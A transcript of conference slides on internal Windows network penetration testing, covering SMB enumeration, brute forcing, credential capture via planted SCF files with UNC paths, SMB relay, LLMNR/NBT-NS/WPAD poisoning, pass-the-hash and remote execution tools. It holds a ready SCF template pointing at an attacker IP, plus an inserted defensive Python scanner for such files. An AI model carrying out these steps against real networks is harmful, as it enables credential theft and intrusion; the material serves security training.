pwning corporate networks in a single day by paulino calderon pale


Upload: websec-mexico-sc

Post on 08-Jan-2017


TRANSCRIPT

Page 1: Pwning corporate networks in a single day by Paulino Calderon Pale

Pwning networks in a single day

Page 2

#cat /etc/about

Paulino Calderón Pale
Twitter: @calderpwn
GitHub: github.com/cldrn/
www.calderonpale.com

Page 3

Things I learned

• 99% of the time it will be Windows.
• Most of the vulnerabilities are unknown until companies get professional help.
• No one knows what software is installed.
• Default configurations are dangerous.

Page 4

SMB versions (timeline figure): 1.0, 2.0, 2.1, 3.0, 3.02

Page 5

Page 6

SMB is our friend

SMB is the most targeted protocol in Windows networks.

With SMB:
• Obtain OS and Active Directory information.
• Steal user network credentials.
• Access shared folders.
• Test credentials.
• Execute commands or binaries remotely (PsExec, WMI, PowerShell…)
• A lot of vulnerable implementations (servers and clients)…

Page 7

Domain controllers

• A lot of domain controllers accept null sessions.
• This insecure configuration reveals information about users and groups.
• We can use this vulnerability to target high privileged users.

Page 8

Obtaining information from a domain controller

enum4linux 0.9 saves users in text files divided by domain groups. The output can be used by Nmap and Metasploit.
Download: https://github.com/cldrn/enum4linux-0.9

Page 9

DOMAIN\USER

Page 10

Obtaining information from domain controllers

polenum obtains the password policy for a domain.

Download from https://labs.portcullis.co.uk/tools/polenum/

Page 11

“QuickPwn”

• Identify DCs.
• Execute enum4linux 0.9: $ enum4linux -a <IP>
• Execute polenum to obtain the password and account lockout policies: polenum <IP>
• Launch a brute force attack to find accounts with weak passwords.
  Metasploit: auxiliary/scanner/smb/smb_login
  Nmap: smb-brute

Page 12

Shared folders

• Enabled to allow people to share files over the network.
• Not uncommon to find sensitive information stored there.

Page 13

“QuickPwn”

• Find sensitive information in shared folders:
  • File Locator Lite or Pro (www.mythicsoft.com)
  • smbmap

Page 14

Stealing user credentials

• There are several techniques that can be used to abuse shared folders to obtain user credentials.
• No patch (vulnerable by design).

Page 15

The classic SMB capture attack

As easy as setting up an SMB server and waiting for users to send us their domain credentials…

Page 16

Demo

Page 17

Who has the time to wait?

Page 18

UNC paths

\\<MACHINE>\<FOLDER>\<FILE>

Page 19

Where can we use UNC paths?

• Web applications / SharePoint / your own web server
• SQL queries
• Office documents
• lmhosts.sam <- host your own malicious hosts file
• LNK files
• SCF files <- easier to create than LNK files

Page 20

“QuickPwn”

• Find a shared folder with write permissions.
• Upload a file containing a UNC path pointing to your SMB server.
• Wait for the credentials…

Page 21

SCF files

[Shell]
Command=2
IconFile=\\<IP ADDRESS>\share\pwn.ico
[Taskbar]
Command=ToggleDesktop
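A defender-side check for the planted-file technique in the UNC path and SCF slides above: an added example that is not part of the talk, which parses SCF content and flags any IconFile (or other value) that is a UNC path to a host outside an allow-list of trusted file servers, so a share can be swept for planted files. The TRUSTED_HOSTS set and the two sample SCF files are constructed for this example.

```python
"""Flag SCF files whose IconFile is a UNC path to an untrusted host. Added example, not from the talk."""
import re
from pathlib import Path

# Allow-list of file servers users legitimately pull icons/files from (constructed for this example).
TRUSTED_HOSTS = {"fileserver01", "fileserver01.corp.example"}
# \\<host>\... : capture the host part of a UNC path.
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\")

def parse_scf(text):
    """Parse the INI-like SCF format into {section: {key: value}}; names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def suspicious_unc_hosts(text, trusted=TRUSTED_HOSTS):
    """List (section, key, host) for every value that is a UNC path to a host not in the allow-list."""
    findings = []
    for section, keys in parse_scf(text).items():
        for key, value in keys.items():
            m = UNC_RE.match(value)
            if m and m.group(1).lower() not in trusted:
                findings.append((section, key, m.group(1).lower()))
    return findings

def scan_share(root, trusted=TRUSTED_HOSTS):
    """Walk a mounted share and return {path: findings} for .scf files that need review."""
    hits = {}
    for path in Path(root).rglob("*.scf"):
        findings = suspicious_unc_hosts(path.read_text(errors="replace"), trusted)
        if findings:
            hits[str(path)] = findings
    return hits

# Constructed samples: a benign icon reference and one pointing at an unknown host.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=\\\\fileserver01\\icons\\app.ico\n[Taskbar]\nCommand=ToggleDesktop\n"
SUSPICIOUS_SCF = "[Shell]\nCommand=2\nIconFile=\\\\10.0.0.99\\share\\pwn.ico\n[Taskbar]\nCommand=ToggleDesktop\n"
```

Run scan_share against a mounted copy of each writable share; a hit means a file on the share points clients at a host that is not a known file server and should be reviewed and removed.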

Page 22

Demo

Page 23

SMB relay attacks

If SMB signing is disabled, SMB relay attacks are possible.

99.9% SMB signing is disabled on Windows workstations (default configuration).

Page 24

Demo

Page 25

Page 26

“QuickPwn”

• Find a shared folder with write permissions.
• Upload a file with a UNC path pointing to your own SMB server.
• Use smbrelayx.py to redirect the connection to your victim and gain access to the machine when a user with enough privileges connects…

Page 27

Can you force users to connect to us?

• The previous attack techniques needed:
  • Users connecting to our SMB server
  • Access to a shared folder with write permissions

But can we use poisoning attacks to force users to connect to us?

Page 28

Thank you WPAD

• Enabled by default in all Windows versions.
• Designed to auto configure proxies in networks.
• Internet Options > LAN Settings > Automatically detect settings

Page 29

LLMNR and NBT-NS

• Enabled in most Windows machines.
• LLMNR (Link-Local Multicast Name Resolution) <- starting from Windows Vista
• NBT-NS (NetBIOS Name Service)
• Allowed in a lot of networks with restrictive access.

Page 30

“QuickPwn”

• Detect WPAD/LLMNR/NBT-NS requests on the network.
• Launch an SMB server to capture user credentials.
• Force users to connect to you through poisoning attacks.
• Capture the user credentials.

Page 31

Demo

Page 32

Demo

Page 33

Demo

Page 34

Page 35

Pass the hash

• It has been around for almost 20 years now.
• A lot of Windows protocols require the hash of the password but not the actual password to authenticate.
• A lot of tools available support PtH:
  • pth-winexe, Mimikatz
  • Metasploit: psexec_command, psexec

Page 36

PtH against RDP

Microsoft introduced “Restricted Admin” mode; now we can use PtH against RDP in Windows 2012 R2 and Windows 8.1 (only admin).

Page 37

Meet PsExec

• Useful to locate systems that share passwords.
• Runs commands or binaries remotely on machines.
• It is very noisy.

Page 38

Demo

Page 39

WDigest

• Auth system that requires Windows to store a plaintext version of the passwords in memory.
• WCE, Mimikatz FTW

Page 40

credmap – The Credential Mapper

Developed by Roberto Salgado from Websec to quickly test credentials against different services online.

Download: https://github.com/lightos/credmap

Page 41

Demo

Page 42

WMI

• PsExec alternative
• Does not start a service
• Does not touch the disk
• In Kali: wmiexec and pth-wmis

Page 43

Pentesters love PowerShell

PowerShell can be used from network reconnaissance to privilege escalation.

Projects worth mentioning:
• PowerSploit: https://github.com/PowerShellMafia/PowerSploit/
• Empire: http://www.powershellempire.com

Page 44

SMB1 vs SMB2 vs SMB3

• Most tools only work with SMB1 (for now).
• SMB2 removes OS fingerprint information pre-auth.
• SMB3 finally introduces message encryption.

Page 45

Demo

Page 46

Other “QuickPwns”

• Golden ticket Kerberos
• Outdated software
• Services with excessive permissions
• Misconfigured network printers
• Development environments with insecure configurations
• Insecure update systems (*)

Page 47

Demo

Page 48

What other vulnerabilities are worth mentioning?

Page 49

Spam

Page 50

OWASP Riviera Maya

Page 51

Nmap: Network Exploration and Security Auditing Cookbook, 2nd edition

Page 52

Websec official channels

• WWW: www.websec.mx
• YouTube: youtube.com/websecmx
• Facebook: websec.mx
• Twitter: @_websec

Page 53

Contact

Paulino Calderón Pale
Twitter: @calderpwn
GitHub: github.com/cldrn/
www.calderonpale.com